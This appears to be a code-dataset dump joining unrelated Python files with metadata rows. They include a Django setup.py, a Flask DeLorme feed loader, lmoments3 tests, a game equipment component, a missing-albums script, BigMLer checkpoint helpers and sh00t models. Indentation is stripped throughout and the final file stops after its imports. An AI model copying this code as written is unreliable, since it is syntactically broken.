if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
elif filenames:
# Strip “dj_user/” or “dj_user\”:
prefix = dirpath[len('dj_user')+1:]
for f in filenames:
data_files.append(os.path.join(prefix, f))
version = get_version().replace(' ', '-')
setup(name='dj-user',
version=version,
description=(
u"Provides batteries-included backends for django.contrib.auth and "
u"django-registration."),
author='Mark Friedenbach',
author_email='mark@monetize.io',
url='http://github.com/monetizeio/dj-user/',
download_url='http://pypi.python.org/packages/source/d/dj-user/dj-user-%s.tar.gz' % version,
package_dir={'dj_user': 'dj_user'},
packages=packages,
package_data={'dj_user': data_files},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=(
'Django>=1.5',
'django-crispy-forms>=1.4.0',
'django-registration>=1.0',
),
)
| lgpl-3.0 | -7,464,357,450,241,061,000 | 34.372881 | 96 | 0.632487 | false | 3.610727 | false | false | false |
myadventure/myadventure-api | app/views/delorme.py | 1 | 5423 | """
Initialize adventure delorme controller
"""
import logging
import urllib.request, urllib.error, urllib.parse
import datetime
from pykml import parser
from flask import Blueprint, abort, request, jsonify
from werkzeug.exceptions import BadRequest
from app.decorators import crossdomain
from app.views.auth import OAUTH
from app.models.adventure import Adventure
from app.models.delorme import Delorme
from app.models.point import Point
MOD_DELORME = Blueprint('delorme', __name__, url_prefix='/api/v1/adventure/<slug>/delorme')
def load_data(feed_url, adventure):
"""Load DeLorme inReach data from specified feed URL."""
obj = urllib.request.urlopen(feed_url)
root = parser.parse(obj).getroot()
for placemark in root.Document.Folder.Placemark:
try:
point = None
extended_data = placemark.ExtendedData.Data
delorme_id = None
event = None
altitude = None
velocity = None
course = None
text = None
desc = None
point_type = 'tracker'
for data in extended_data:
if data.attrib['name'] == 'Id':
delorme_id = int(data.value.text)
elif data.attrib['name'] == 'Event':
event = data.value.text.encode('utf-8')
elif data.attrib['name'] == 'Elevation':
altitude = data.value.text.encode('utf-8')
elif data.attrib['name'] == 'Velocity':
velocity = data.value.text.encode('utf-8')
elif data.attrib['name'] == 'Course':
course = data.value.text.encode('utf-8')
elif data.attrib['name'] == 'Text':
text = data.value.text
if text is not None:
text = text.encode('utf-8')
if delorme_id is not None:
point = adventure.points.filter( \
point_type=point_type, delorme_id=delorme_id \
).first()
if point is None:
title = event
coordinates = placemark.Point.coordinates.text.split(',')
latitude = float(coordinates[1])
longitude = float(coordinates[0])
timestamp = datetime.datetime.strptime( \
placemark.TimeStamp.when.text, "%Y-%m-%dT%H:%M:%SZ" \
)
if text is not None:
desc = text
point_type = 'message'
point = Point(
title=title,
desc=desc,
altitude=altitude,
speed=velocity,
direction=course,
latitude=latitude,
longitude=longitude,
resource=None,
point_type=point_type,
timestamp=timestamp,
delorme_id=delorme_id,
aio_id=None,
hide=False,
thumb=None,
photo=None,
video=None,
battery=None,
source='delorme',
user=None
)
adventure.points.append(point)
adventure.save()
except AttributeError as err:
if 'no such child' not in err.message:
logging.error(err)
return abort(500)
return jsonify({'status': 'ok'})
@MOD_DELORME.route('/', methods=['POST'])
@crossdomain(origin='*')
@OAUTH.require_oauth('email')
def add_delorme(slug):
"""Add Delorme inReach feed URL to Adventure object defined by slug"""
try:
adventure = Adventure.objects.get(slug=slug)
feed_url = request.values.get('feed_url', None)
adventure.delorme = Delorme(
feed_url=feed_url
)
adventure.save()
return jsonify({'delorme': adventure.delorme.to_dict()})
except TypeError as err:
logging.error(err)
abort(400)
except BadRequest:
abort(400)
return
@MOD_DELORME.route('/', methods=['GET'])
@crossdomain(origin='*')
@OAUTH.require_oauth('email')
def get_delorme(slug):
"""Get Delorme inReach information."""
try:
adventure = Adventure.objects.get(slug=slug)
if adventure.delorme:
return jsonify({'delorme': adventure.delorme.to_dict()})
return jsonify({'error': 'DeLorme inReach information is not configured.'}), 400
except TypeError as err:
logging.error(err)
abort(400)
except BadRequest:
abort(400)
return
@MOD_DELORME.route('/', methods=['DELETE'])
@crossdomain(origin='*')
@OAUTH.require_oauth('email')
def delete_point(slug):
"""Delete DeLorme inReach information."""
Adventure.objects(slug=slug).update(unset__delorme=1, upsert=True)
return jsonify({'status': 'ok'})
@MOD_DELORME.route('/load', methods=['GET'])
@OAUTH.require_oauth('email')
def load_tracker(slug):
"""Load DeLorme inReach tracker points from configured feed URL."""
adventure = Adventure.objects(slug=slug).get()
delorme = adventure.delorme
if delorme.feed_url is not None:
return load_data(delorme.feed_url, adventure)
return jsonify({'error': 'DeLorme inReach information is not set.'}), 400
| apache-2.0 | 7,527,526,077,902,378,000 | 33.322785 | 91 | 0.551724 | false | 4.047015 | false | false | false |
OpenHydrology/lmoments3 | lmoments3/tests/test_samlmu_speed.py | 1 | 1493 | import unittest
from datetime import datetime
import lmoments3 as lm
from lmoments3 import distr
import numpy as np
class TestSamlmuSpeed(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.n = 50
kappa_distr = distr.kap(loc=-0.7, scale=2.6, k=0.9, h=1.6)
cls.record = kappa_distr.ppf(np.random.random(cls.n * 10000))
def setUp(self):
self.start_time = datetime.now()
def tearDown(self):
duration = datetime.now() - self.start_time
print("Test {} ran for {} s.".format(self.id(), duration.total_seconds()))
def test_n50_nmom3(self):
start_i = 0
for i in range(10000):
l1, l2, t3 = lm.lmom_ratios(self.record[start_i:start_i + self.n], nmom=3)
t2 = l2 / l1
start_i += self.n
def test_n50_nmom4(self):
start_i = 0
for i in range(10000):
l1, l2, t3, t4 = lm.lmom_ratios(self.record[start_i:start_i + self.n], nmom=4)
t2 = l2 / l1
start_i += self.n
class TestKappaSpeed(unittest.TestCase):
def setUp(self):
self.start_time = datetime.now()
def tearDown(self):
duration = datetime.now() - self.start_time
print("Test {} ran for {} s.".format(self.id(), duration.total_seconds()))
def test_n50(self):
n = 50
kappa_distr = distr.kap(loc=-0.7, scale=2.6, k=0.9, h=1.6)
for i in range(10000):
record = kappa_distr.ppf(np.random.random(n)) | gpl-3.0 | -230,801,476,502,980,300 | 29.489796 | 90 | 0.58138 | false | 3.016162 | true | false | false |
jpalladino84/Python-Roguelike-Framework | components/equipment.py | 2 | 4828 | from components.component import Component
from stats.enums import StatsEnum
from itertools import chain
from util.decorators import cached, invalidate_cache
class Equipment(Component):
NAME = "equipment"
"""
This component attaches itself to anything with a bodies.
It represents equipment worn or wielded
"""
def __init__(self):
super().__init__()
self.host_body = None
self.worn_equipment_map = {}
self.wielded_equipment_map = {}
def copy(self):
# TODO Copying an equipment to another type of body would require some sort of validation.
# TODO Removing or dropping invalid mappings.
new_equipment = Equipment()
new_equipment.host_body = self.host_body
new_equipment.worn_equipment_map = self.__copy_all_items(self.worn_equipment_map)
new_equipment.wielded_equipment_map = self.__copy_all_items(self.wielded_equipment_map)
return new_equipment
@staticmethod
def __copy_all_items(collection):
collection_copy = collection.copy()
for index, item_list in enumerate(collection):
collection_copy[index].clear()
for item in item_list:
collection_copy[index].append(item.copy())
return collection_copy
def on_register(self, host):
super().on_register(host)
self.host_body = host.body
@invalidate_cache
def wear(self, item):
# Wearing requires the bodypart to be compatible with the item
if not self.host_body:
self.host_body = self.host.body
if item.armor:
armor = item.armor
if item.stats.get_current_value(StatsEnum.Size) == self.host.stats.get_current_value(StatsEnum.Size):
for compatible_bodypart_uid in armor.wearable_body_parts_uid:
host_body_parts = self.host_body.get_body_parts(compatible_bodypart_uid)
for host_body_part in host_body_parts:
if host_body_part:
if host_body_part in self.worn_equipment_map:
if armor.worn_layer not in [item.armor.worn_layer for item in
self.worn_equipment_map[host_body_part]]:
self.worn_equipment_map[host_body_part].append(item)
return True
else:
self.worn_equipment_map[host_body_part] = [item]
return True
return False
@invalidate_cache
def wield(self, item):
if not self.host_body:
self.host_body = self.host.body
# Wielding requires bodyparts with GRASP
grasp_able_body_parts = self.host_body.get_grasp_able_body_parts()
# Wielding with one hand gets priority
two_hands_wielders = []
for grasp_able_body_part in grasp_able_body_parts:
if grasp_able_body_part in self.wielded_equipment_map:
continue
# 10 is the normal relative_size for a hand
relative_size_modifier = grasp_able_body_part.relative_size - 10
relative_size_modifier = round(relative_size_modifier / 10) if relative_size_modifier else 0
relative_size = self.host.stats.get_current_value(StatsEnum.Size) + relative_size_modifier
item_size = int(item.stats.get_current_value(StatsEnum.Size))
if relative_size >= item_size >= relative_size - 2:
# Can be wielded in one "hands"
self.wielded_equipment_map[grasp_able_body_part] = item
return True
elif relative_size < item_size <= relative_size + 2:
# Can be wielded in two "hands"
two_hands_wielders.append(grasp_able_body_part)
if len(two_hands_wielders) >= 2:
first_wield = two_hands_wielders[0]
second_wield = two_hands_wielders[1]
self.wielded_equipment_map[first_wield] = item
self.wielded_equipment_map[second_wield] = item
return True
return False
@cached
def get_worn_items(self):
return [item for item_list in self.worn_equipment_map.values() for item in item_list]
@cached
def get_load_of_worn_items(self):
worn_items = self.get_worn_items()
total_weight = 0.0
for item in worn_items:
item_weight = item.stats.get_current_value(StatsEnum.Weight)
material_modifier = item.material.weight
total_weight += item_weight * material_modifier
return total_weight
@cached
def get_wielded_items(self):
return [item for item in self.wielded_equipment_map.values()]
| mit | 8,653,732,156,884,264,000 | 39.915254 | 113 | 0.594863 | false | 3.85623 | false | false | false |
palfrey/missing-albums | missing_albums.py | 1 | 12337 | from mutagen import File
from mutagen.asf import ASF, ASFTags
from mutagen.apev2 import APEv2File
from mutagen.flac import FLAC
from mutagen.id3 import ID3FileType
from mutagen.easyid3 import EasyID3
from mutagen.mp3 import MP3
from mutagen.oggflac import OggFLAC
from mutagen.oggspeex import OggSpeex
from mutagen.oggtheora import OggTheora
from mutagen.oggvorbis import OggVorbis
from mutagen.trueaudio import TrueAudio
from mutagen.wavpack import WavPack
from mutagen.mp4 import MP4, MP4Tags
from mutagen.musepack import Musepack
from mutagen.monkeysaudio import MonkeysAudio
from mutagen.optimfrog import OptimFROG
import amazon
import logging
import musicbrainz2.webservice as ws
import musicbrainz2.model as m
import sqlite3
from os import walk
from os.path import splitext,join, abspath
import sys
from time import sleep, strptime, struct_time, localtime
from types import IntType
import math
import codecs
from genshi.template import NewTextTemplate
from os import mkdir
from os.path import exists
from optparse import OptionParser
from ConfigParser import ConfigParser
parser = OptionParser()
parser.add_option("-m","--music-dir",dest="directory",default=".",help="Pick music files directory. Default is current directory")
parser.add_option("-d","--database",dest="db", default="songs.db",help="Songs database file")
parser.add_option("--overrides", dest="overrides", default=None, help="Overrides info file")
parser.add_option("--no-walk",dest="walk",default="True",action="store_false",help="Don't re-read music directory")
parser.add_option("--artists-only", dest="artistsOnly", default="False", action="store_true", help="Write out simplified artists list")
(opts,args) = parser.parse_args()
overrides = {"artist": {}, "ignore": {}}
if opts.overrides != None:
cp = ConfigParser()
cp.read([opts.overrides])
for section in cp.sections():
if section == "artist":
overrides["artist"] = dict(cp.items(section))
elif section == "ignore":
overrides["ignore"] = cp.options(section)
else:
raise Exception, section
class EasyMP3(MP3):
def __init__(self, *args, **kwargs):
kwargs['ID3'] = EasyID3
MP3.__init__(self,*args, **kwargs)
class EasierTags:
def __getitem__(self, key):
if key in self.simpler.keys():
return self._parent.__getitem__(self,self.simpler[key])
else:
return self._parent.__getitem__(self, key)
class EasyMP4Tags(MP4Tags, EasierTags):
simpler = {"title":"\xa9nam","artist":"\xa9ART","album":"\xa9alb"}
class EasyMP4(MP4):
def load(self, filename):
MP4.load(self,filename)
self.tags.__class__ = EasyMP4Tags
class EasyASFTags(EasierTags, ASFTags):
_parent = ASFTags
simpler = {"title":"Title"}
class EasyASF(ASF):
def load(self, filename):
ASF.load(self,filename)
self.tags.__class__ = EasyASFTags
options = [EasyMP3, TrueAudio, OggTheora, OggSpeex, OggVorbis, OggFLAC,
FLAC, APEv2File, EasyMP4, ID3FileType, WavPack, Musepack,
MonkeysAudio, OptimFROG, EasyASF]
doregen = True
con = sqlite3.connect(opts.db)
cur = con.cursor()
cur.execute("select name from sqlite_master where type='table' and name='songs'")
if len(cur.fetchall())==0:
cur.execute("create table songs (fullpath text(300) primary key, artist text(100),album text(100),title text(100),duration integer);")
con.commit()
if opts.walk:
for path, dirs, files in walk(opts.directory):
for f in files:
if f[0] == ".":
continue # ignore hidden files
try:
fp = unicode(abspath(join(path,f)),"utf_8","ignore")
except UnicodeDecodeError:
print type(join(path,f)),path,f
raise
cur.execute("select artist,album,title,duration from songs where fullpath=?", (fp,))
d = cur.fetchall()
if d==[]:
try:
data = File(fp, options=options)
except IOError,e:
print e
print "rebuilding song db"
data = None
if data == None:
cur.execute("insert into songs (fullpath,duration) values(?,?)",(fp, -1))
con.commit()
continue
try:
try:
artist = data["artist"][0].strip()
except KeyError:
artist = unicode("")
try:
album = data["album"][0].strip()
except KeyError:
album = unicode("")
try:
title = data["title"][0].strip()
except KeyError:
title = unicode("")
duration = int(data.info.length)
print (fp, artist, album, title, duration)
cur.execute("insert into songs values(?,?,?,?,?)",(fp, artist, album, title, duration))
con.commit()
except KeyError:
print fp,data.keys()
raise
cur.execute("select artist,album, count(title) from songs group by artist,album having count(title)>2 and artist!=\"\"")
artists = {}
lower = {}
d = cur.fetchall()
#print d
for (artist, album,title) in d:
if artist.lower() in lower:
artist = lower[artist.lower()]
if artist not in artists:
artists[artist] = {}
lower[artist.lower()] = artist
artists[artist][album] = title
#print artists.keys()
logging.basicConfig()
logger = logging.getLogger()
#logger.setLevel(logging.DEBUG)
def getAlbums(artist):
cur.execute("select album, asin, date, ep from musicbrainz where artist=?", (artist,))
d = cur.fetchall()
if d == []:
q = ws.Query()
f = ws.ArtistFilter(query=artist, limit=5)
while True:
try:
artistResults = q.getArtists(f)
break
except BaseException, e:
print "problem during artist name", e
sleep(5)
ret = {}
for artistResult in artistResults:
print "name", artistResult.artist.name
artist_id = artistResult.artist.id
release_ids = []
for kind in (m.Release.TYPE_ALBUM, m.Release.TYPE_EP, m.Release.TYPE_SOUNDTRACK, m.Release.TYPE_LIVE):
while True:
try:
# The result should include all official albums.
#
inc = ws.ArtistIncludes(
releases=(m.Release.TYPE_OFFICIAL, kind),
tags=True)
release_ids.extend([(x.id,kind) for x in q.getArtistById(artist_id, inc).getReleases()])
break
except BaseException, e:
print "problem during releases", e
sleep(5)
if release_ids == []:
print "No releases found for %s"%artist
continue
print "release ids", release_ids
ret = {}
lower = {}
for (id,kind) in release_ids:
inc = ws.ReleaseIncludes(artist=True, releaseEvents=True)
while True:
try:
release = q.getReleaseById(id, inc)
break
except BaseException, e:
print "problem during release", e
sleep(5)
if release.asin == None: # ignore these
print "skipping because no ASIN:", id, release.title
continue
title = release.title
if title.find("(disc ")!=-1:
title = title[:title.find("(disc ")].strip()
#assert title not in ret.keys(),(title, release)
if title.lower() in lower:
title = lower[title.lower()]
else:
lower[title.lower()] = title
ret[title] = {"when":release.getEarliestReleaseDate(), "asin":release.asin, "ep": kind == m.Release.TYPE_EP}
print "got", title
if ret == {}:
print "no usable releases"
continue
else:
break
if ret == {}:
raise Exception, "No usable albums/artists found for %s. Try fixing one of the entries marked 'skipping because no ASIN', or add to the ignore list"%artist
for title in ret:
cur.execute("insert into musicbrainz values(?, ?, ?, ?, ?)", (artist, title, ret[title]["asin"], ret[title]["when"], ret[title]["ep"]))
con.commit()
else:
ret = {}
lower = {}
for (album, asin, when, ep) in d:
if album.lower() in lower:
album = lower[album.lower()]
else:
lower[album.lower()] = album
ret[album] = {"asin":asin, "when":when, "ep": ep}
keys = ret.keys()
for title in keys:
if title.find("(")!=-1:
stripped = title[:title.find("(")].strip()
if len(stripped)>0 and stripped[-1] == ".":
stripped = stripped[:-1]
if stripped in ret.keys():
print "removed", title, stripped
del ret[title]
continue
try:
ret[title]["when"] = strptime(ret[title]["when"], "%Y-%m-%d")
except ValueError:
if ret[title]["when"].find("-")!=-1:
ret[title]["when"] = struct_time((int(ret[title]["when"][:ret[title]["when"].find("-")]),0,0,0,0,0,0,0,0))
else:
ret[title]["when"] = struct_time((int(ret[title]["when"]),0,0,0,0,0,0,0,0))
except TypeError:
if type(ret[title]["when"]) == IntType:
ret[title]["when"] = struct_time((ret[title]["when"],0,0,0,0,0,0,0,0))
elif ret[title]["when"] == None:
pass
else:
raise
return ret
most_tracks = [x for x in sorted(artists.keys(), lambda x,y:cmp(sum(artists[y].values()), sum(artists[x].values()))) if sum(artists[x].values())>3]
print most_tracks
cur.execute("select name from sqlite_master where type='table' and name='musicbrainz'")
if len(cur.fetchall())==0:
cur.execute("create table musicbrainz (artist text(100), album text(100), asin text(20), date integer, ep boolean, primary key(artist, album));")
con.commit()
cur.execute("select name from sqlite_master where type='table' and name='amazon'")
if len(cur.fetchall())==0:
cur.execute("create table amazon (artist text(100), album text(100), url text(500), image text(500), amazon_new integer, primary key(artist, album));")
con.commit()
def compact(inp):
inp = inp.lower()
return inp.replace("'","").replace(","," ").replace("&"," ").replace(":", " ").replace(".", " ")
missing = {}
for artist in most_tracks:
if artist.lower() in overrides["artist"]:
newartist = overrides["artist"][artist.lower()]
artists[newartist] = artists[artist]
del artists[artist]
artist = newartist
if artist.lower() in overrides["ignore"]:
continue
print "artist",artist, type(artist), artist.encode("utf-8")
albums = getAlbums(artist)
print artist, albums.keys(), artists[artist]
newest = None
for got_a in artists[artist].keys():
use_a = None
if got_a in albums.keys():
use_a = got_a
else:
items = [x for x in compact(got_a).split() if x not in ("(ep)",)]
for k in albums.keys():
for i in items:
if i not in compact(k):
break
else:
#print "found all bits", items, k
use_a = k
break
if use_a != None:
if newest == None or newest < albums[use_a]['when']:
newest = albums[use_a]['when']
else:
print "Can't find '%s'"%got_a, albums.keys()
for a in albums.keys():
if albums[a]['when'] > newest and not albums[a]['ep']:
#print "don't have",a, albums[a]['asin'], artist
cur.execute("select url, image, amazon_new from amazon where artist=? and album=?",(artist, a))
d = cur.fetchall()
if d == []:
results = amazon.searchByTitle(artist, a)
cur.execute("insert into amazon values(?, ?, ?, ?, ?)",(artist, a, unicode(results["url"]), unicode(results["image"]), results["amazon_new"]))
con.commit()
else:
d = d[0]
def realNone(x):
if x == "None":
return None
else:
return x
d = [realNone(x) for x in d]
results = {"title":a, "url":d[0], "image":d[1], "amazon_new":d[2]}
print "missing",results, albums[a]['when'], artist
when = albums[a]['when']
if when not in missing:
missing[when] = []
results["artist"] = artist
results["when"] = when
missing[when].append(results)
#raise Exception,albums[a]
#break
artists = {}
if opts.artistsOnly:
for when in sorted(missing, reverse = True):
for m in missing[when]:
if m["artist"] not in artists:
artists[m["artist"]] = []
artists[m["artist"]].append(m["title"])
f = codecs.open("artists.txt", "wb", "utf-8")
for a in sorted(artists):
f.write(u"%s - %s\n"%(a, ", ".join(artists[a])))
f.close()
sys.exit(0)
folder = "output"
if not exists(folder):
mkdir(folder)
flattened = []
for key in sorted(missing, reverse = True):
if key > localtime(): # ignore items not released yet
continue
flattened.extend([x for x in missing[key] if x["url"]!=None])
count = len(flattened)
perpage = 10
pages = int(math.ceil(count/(perpage*1.0)))
print count, pages
links = [("1", "index.html")] + [(str(x), "index%03d.html"%x) for x in range(2, pages+1)]
for start in range(0, count, perpage):
index = (start/perpage) + 1
if index == 1:
name = "index.html"
else:
name = "index%03d.html"%index
print flattened[start:start+perpage]
nt = NewTextTemplate(file("template.html").read())
open(join(folder,name), "wb").write(nt.generate(albums = flattened[start:start+perpage], links = links, index = str(index)).render())
| agpl-3.0 | -8,553,838,431,859,450,000 | 29.017032 | 158 | 0.656156 | false | 3.023775 | false | false | false |
brokendata/bigmler | bigmler/checkpoint.py | 1 | 12195 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Checkpoint functions for BigMLer
"""
from __future__ import absolute_import
import os
import bigml.api
from bigml.util import console_log
from bigmler.utils import log_message
def is_source_created(path, suffix=""):
"""Checks existence and reads the source id from the source file in the
path directory
"""
source_id = None
try:
with open("%s%ssource%s" % (path, os.sep, suffix)) as source_file:
source_id = source_file.readline().strip()
try:
source_id = bigml.api.get_source_id(source_id)
return True, source_id
except ValueError:
return False, None
except IOError:
return False, None
def is_dataset_created(path, suffix=""):
"""Checks existence and reads the dataset id from the dataset file in
the path directory
"""
dataset_id = None
try:
with open("%s%sdataset%s" % (path, os.sep, suffix)) as dataset_file:
dataset_id = dataset_file.readline().strip()
try:
dataset_id = bigml.api.get_dataset_id(dataset_id)
return True, dataset_id
except ValueError:
return False, None
except IOError:
return False, None
def are_datasets_created(path, number_of_datasets, suffix='parts'):
"""Checks existence and reads the dataset ids from the datasets file in
the path directory
"""
dataset_ids = []
try:
with open("%s%sdataset_%s" % (path, os.sep, suffix)) as datasets_file:
for line in datasets_file:
dataset = line.strip()
try:
dataset_id = bigml.api.get_dataset_id(dataset)
dataset_ids.append(dataset_id)
except ValueError:
return False, dataset_ids
if len(dataset_ids) == number_of_datasets:
return True, dataset_ids
else:
return False, dataset_ids
except IOError:
return False, dataset_ids
def are_models_created(path, number_of_models):
"""Checks existence and reads the model ids from the models file in the
path directory
"""
model_ids = []
try:
with open("%s%smodels" % (path, os.sep)) as models_file:
for line in models_file:
model = line.strip()
try:
model_id = bigml.api.get_model_id(model)
model_ids.append(model_id)
except ValueError:
return False, model_ids
if len(model_ids) == number_of_models:
return True, model_ids
else:
return False, model_ids
except IOError:
return False, model_ids
def are_predictions_created(predictions_file, number_of_tests):
"""Checks existence and reads the predictions from the predictions file in
the path directory
"""
predictions = file_number_of_lines(predictions_file)
if predictions != number_of_tests:
os.remove(predictions_file)
return False, None
return True, None
def is_evaluation_created(path):
"""Checks existence and reads the evaluation id from the evaluation file
in the path directory
"""
evaluation_id = None
try:
with open("%s%sevaluation" % (path, os.sep)) as evaluation_file:
evaluation_id = evaluation_file.readline().strip()
try:
evaluation_id = bigml.api.get_evaluation_id(evaluation_id)
return True, evaluation_id
except ValueError:
return False, None
except IOError:
return False, None
def are_evaluations_created(path, number_of_evaluations):
"""Checks existence and reads the evaluation ids from the evaluations file
in the path directory and checks the corresponding evaluations
"""
evaluation_ids = []
try:
with open("%s%sevaluations" % (path, os.sep)) as evaluations_file:
for line in evaluations_file:
evaluation = line.strip()
try:
evaluation_id = bigml.api.get_evaluation_id(evaluation)
evaluation_ids.append(evaluation_id)
except ValueError:
return False, evaluation_ids
if len(evaluation_ids) == number_of_evaluations:
return True, evaluation_ids
else:
return False, evaluation_ids
except IOError:
return False, evaluation_ids
def are_ensembles_created(path, number_of_ensembles):
"""Checks and reads the ensembles ids from the ensembles file in the
path directory
"""
ensemble_ids = []
try:
with open("%s%sensembles" % (path, os.sep)) as ensembles_file:
for line in ensembles_file:
ensemble = line.strip()
try:
ensemble_id = bigml.api.get_ensemble_id(ensemble)
ensemble_ids.append(ensemble_id)
except ValueError:
return False, ensemble_ids
if len(ensemble_ids) == number_of_ensembles:
return True, ensemble_ids
else:
return False, ensemble_ids
except IOError:
return False, ensemble_ids
def checkpoint(function, *args, **kwargs):
"""Redirects to each checkpoint function
"""
common_parms = ['debug', 'message', 'log_file', 'console']
debug = kwargs.get('debug', False)
message = kwargs.get('message', None)
log_file = kwargs.get('log_file', None)
console = kwargs.get('console', False)
f_kwargs = {key: value for key, value in kwargs.items()
if not key in common_parms}
result = function(*args, **f_kwargs)
if debug:
console_log("Checkpoint: checking %s with args:\n%s\n\nResult:\n%s\n" %
(function.__name__, "\n".join([repr(arg) for arg in args]),
repr(result)))
# resume is the first element in the result tuple
if not result[0] and message is not None:
log_message(message, log_file=log_file, console=console)
return result
def file_number_of_lines(file_name):
"""Counts the number of lines in a file
"""
try:
item = (0, None)
with open(file_name) as file_handler:
for item in enumerate(file_handler):
pass
return item[0] + 1
except IOError:
return 0
def is_batch_prediction_created(path):
"""Checks existence and reads the batch prediction id from the
batch_prediction file in the path directory
"""
batch_prediction_id = None
try:
with open("%s%sbatch_prediction"
% (path, os.sep)) as batch_prediction_file:
batch_prediction_id = batch_prediction_file.readline().strip()
try:
batch_prediction_id = bigml.api.get_batch_prediction_id(
batch_prediction_id)
return True, batch_prediction_id
except ValueError:
return False, None
except IOError:
return False, None
def is_batch_centroid_created(path):
"""Checks existence and reads the batch centroid id from the
batch_centroid file in the path directory
"""
batch_centroid_id = None
try:
with open("%s%sbatch_centroid"
% (path, os.sep)) as batch_prediction_file:
batch_centroid_id = batch_prediction_file.readline().strip()
try:
batch_centroid_id = bigml.api.get_batch_centroid_id(
batch_centroid_id)
return True, batch_centroid_id
except ValueError:
return False, None
except IOError:
return False, None
def are_clusters_created(path, number_of_clusters):
"""Checks existence and reads the cluster ids from the clusters file in the
path directory
"""
cluster_ids = []
try:
with open("%s%sclusters" % (path, os.sep)) as clusters_file:
for line in clusters_file:
cluster = line.strip()
try:
cluster_id = bigml.api.get_cluster_id(cluster)
cluster_ids.append(cluster_id)
except ValueError:
return False, cluster_ids
if len(cluster_ids) == number_of_clusters:
return True, cluster_ids
else:
return False, cluster_ids
except IOError:
return False, cluster_ids
def is_dataset_exported(filename):
"""Checks the existence of the CSV exported dataset file
"""
try:
with open(filename):
return True
except IOError:
return False
def is_batch_anomaly_score_created(path):
"""Checks existence and reads the batch anomaly score id from the
batch_anomaly_score file in the path directory
"""
batch_anomaly_score_id = None
try:
with open("%s%sbatch_anomaly_score"
% (path, os.sep)) as batch_prediction_file:
batch_anomaly_score_id = batch_prediction_file.readline().strip()
try:
batch_anomaly_score_id = bigml.api.get_batch_anomaly_score_id(
batch_anomaly_score_id)
return True, batch_anomaly_score_id
except ValueError:
return False, None
except IOError:
return False, None
def are_anomalies_created(path, number_of_anomalies):
"""Checks existence and reads the anomaly detector ids from the
anomalies file in the path directory
"""
anomaly_ids = []
try:
with open("%s%sanomalies" % (path, os.sep)) as anomalies_file:
for line in anomalies_file:
anomaly = line.strip()
try:
anomaly_id = bigml.api.get_anomaly_id(anomaly)
anomaly_ids.append(anomaly_id)
except ValueError:
return False, anomaly_ids
if len(anomaly_ids) == number_of_anomalies:
return True, anomaly_ids
else:
return False, anomaly_ids
except IOError:
return False, anomaly_ids
def is_project_created(path):
"""Checks existence and reads project id from the
project file in the path directory
"""
project_id = None
try:
with open("%s%sproject"
% (path, os.sep)) as project_file:
project_id = project_file.readline().strip()
try:
project_id = bigml.api.get_project_id(
project_id)
return True, project_id
except ValueError:
return False, None
except IOError:
return False, None
def are_samples_created(path, number_of_samples):
"""Checks existence and reads the samples ids from the samples file in the
path directory
"""
sample_ids = []
try:
with open("%s%ssamples" % (path, os.sep)) as samples_file:
for line in samples_file:
sample = line.strip()
try:
sample_id = bigml.api.get_sample_id(sample)
sample_ids.append(sample_id)
except ValueError:
return False, sample_ids
if len(sample_ids) == number_of_samples:
return True, sample_ids
else:
return False, sample_ids
except IOError:
return False, sample_ids
| apache-2.0 | -7,124,479,175,667,289,000 | 30.757813 | 79 | 0.581058 | false | 4.294014 | false | false | false |
pavanw3b/sh00t | configuration/models.py | 1 | 3058 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from datetime import datetime
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class MethodologyMaster(models.Model):
name = models.CharField(max_length=100)
description = models.TextField(default="")
order = models.IntegerField(default=0)
created_by = models.ForeignKey(User, related_name="methodology_created_by", null=True, on_delete=models.CASCADE)
created = models.DateTimeField(default=datetime.now)
updated_by = models.ForeignKey(User, related_name="methodology_updated_by", null=True, on_delete=models.CASCADE)
updated = models.DateTimeField(default=datetime.now)
def __str__(self): # __unicode__ on Python 2
return self.name
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.updated = timezone.now()
return super(MethodologyMaster, self).save(*args, **kwargs)
class Meta:
ordering = ('name',)
@python_2_unicode_compatible
class ModuleMaster(models.Model):
name = models.CharField(max_length=100)
description = models.TextField(default="")
order = models.IntegerField(default=0)
methodology = models.ForeignKey(MethodologyMaster, on_delete=models.CASCADE, null=True, default=None)
created_by = models.ForeignKey(User, related_name="module_created_by", null=True, on_delete=models.CASCADE)
created = models.DateTimeField(default=datetime.now)
updated_by = models.ForeignKey(User, related_name="module_updated_by", null=True, on_delete=models.CASCADE)
updated = models.DateTimeField(default=datetime.now)
def __str__(self): # __unicode__ on Python 2
return self.name
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.updated = timezone.now()
return super(ModuleMaster, self).save(*args, **kwargs)
class Meta:
ordering = ('name',)
@python_2_unicode_compatible
class CaseMaster(models.Model):
name = models.CharField(max_length=100)
module = models.ForeignKey(ModuleMaster, on_delete=models.CASCADE)
description = models.TextField(default="")
order = models.IntegerField(default=0)
created_by = models.ForeignKey(User, related_name="case_module_created_by", null=True, on_delete=models.CASCADE)
created = models.DateTimeField(default=datetime.now)
updated_by = models.ForeignKey(User, related_name="case_module_updated_by", null=True, on_delete=models.CASCADE)
updated = models.DateTimeField(default=datetime.now)
def __str__(self): # __unicode__ on Python 2
return self.name
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.updated = timezone.now()
return super(CaseMaster, self).save(*args, **kwargs)
class Meta:
ordering = ('name',)
| apache-2.0 | -6,504,898,097,162,188,000 | 38.205128 | 116 | 0.691956 | false | 3.83208 | false | false | false |
hpfem/agros2d | resources/python/jedi/interpret.py | 2 | 5520 | """
Module to handle interpreted Python objects.
"""
import itertools
import tokenize
from jedi import parsing_representation as pr
